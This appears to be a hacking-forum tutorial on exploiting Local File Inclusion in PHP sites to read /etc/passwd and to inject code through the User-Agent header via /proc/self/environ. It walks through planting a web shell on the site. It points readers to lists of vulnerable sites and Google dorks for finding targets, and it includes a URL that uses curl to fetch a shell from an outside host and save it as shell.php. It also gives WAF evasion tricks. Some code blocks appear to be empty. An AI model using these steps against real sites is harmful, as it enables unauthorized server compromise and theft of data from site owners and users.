Hey guys, today I'm going to be going over a brief tutorial on what LFI is, and how to use it to get shell access.
LFI stands for Local File Inclusion, which gives you access to read files on a server through your web browser.
A vulnerable link looks something like this:
Code:
www.site.com/index.php?page=/etc/passwdHere's what the code looks like that makes it vulnerable.
Code:
First off, you're going to need a few things.
1. FireFox
2. Tamper Data
3. Vulnerable Sites
Here's a few threads with vulnerable links.
LFI Sites #1
LFI Sites #2
LFI Sites #3
LFI Sites #4
LFI Sites #5
LFI Sites #6
If you can't find any good ones from those lists, use google dorks to find some.
Here's a few dorks.
Code:
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=I'm going to be showing you how to exploit LFI and get your shell uploaded via /proc/self/environ
So after you got your site, try checking if you can access /etc/passwd.
Your page should come up with something that looks like this.
Spoiler (Click to Hide)
![[Image: WWhdO.png]](http://i.imgur.com/WWhdO.png)
Good, now we know that site is vulnerable.
Now we need to check for /proc/self/environ
So change your path to /proc/self/environ
Your page should look something like this if the file exists, not all sites have it.
Spoiler (Click to Hide)
![[Image: 23eiv.png]](http://i.imgur.com/23eiv.png)
The part we're interested in, is the HTTP_USER_AGENT. We're going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.
To do this, we're going to use tamperdata. Once you have it installed, go to your options, and go down into TamperData.
Spoiler (Click to Hide)
![[Image: 2go5x.png]](http://i.imgur.com/2go5x.png)
Now you should have a window that looks like this.
Spoiler (Click to Hide)
![[Image: BjBY1.png]](http://i.imgur.com/BjBY1.png)
So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.
We're going to try some code injection.
After you start tampering, you should see a window that looks something like this:
Spoiler (Click to Hide)
![[Image: hulSq.png]](http://i.imgur.com/hulSq.png)
In the User-Agent field, type:
Code:
Now when your site is down loading, you should get an image that looks something like this if you did it correctly.
Spoiler (Click to Hide)
![[Image: 2Thk1.png]](http://i.imgur.com/2Thk1.png)
Now we know we can execute code, so let's get our shell uploaded using wget.
Open TamperData again, click start tamper, and refresh your site. This time, on the User-Agent enter this:
Code:
Spoiler (Click to Hide)
![[Image: JcK3Y.png]](http://i.imgur.com/JcK3Y.png)
This downloads that text file, and renames it as a php file (your shell).
You can upload your shell as a text file using free webhosting...I already shelled a site, so I'm gonna use that site as file hosting.
Once you're done with that, you can try and access your shell directly by going to site/shell.php
If you get an error, try using the same method as when you got your vulnerable link.
Example:
Code:
http://www.site.com/index.php?page=/etc/passwdLoad your shell by using the same method.
Code:
http://www.site.com/index.php?page=shell.phpIf it loads fine the second time, you can upload a file using your shell to directly access it.
When you're all done, you have a sexy shell, kinda like this :3
Spoiler (Click to Hide)
![[Image: 0rDhb.png]](http://i.imgur.com/0rDhb.png)
Alternate Methods
Sometimes sites will take extra precaution to prevent attacks like these.
Here is an alternate method.
Change your user agent to:
Code:
Now load your url as:
Code:
/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.phpSo your url should look like:
Code:
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.phpNow hopefully you got around it, and got your shell uploaded.
Special thanks to Hooded Robin for all the help he's given me with LFI.
I recommend you take a look at his video tutorial using Burp Suite.
You can check it out Here
Thanks alot <3
If you guys need anything, post here or feel free to PM me. I'll get back to you as soon as I can.
Filter Evasion
As you know, some sites have Web Application Firewalls, or WAFs installed. In order to bypass these, here's a few techniques you can try.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
Example:
Code:
http://www.site.com/index.php?page=/etc/passwdIt's pretty basic.
URL Encoding.
Here's another method, url encoding.
Encode your slashes, or unallowed characters to bypass these.
Code:
http://www.site.com/index.php?page=%2fetc%2fpasswdSpoiler (Click to Hide)
-DownFall
Categories:
LFI
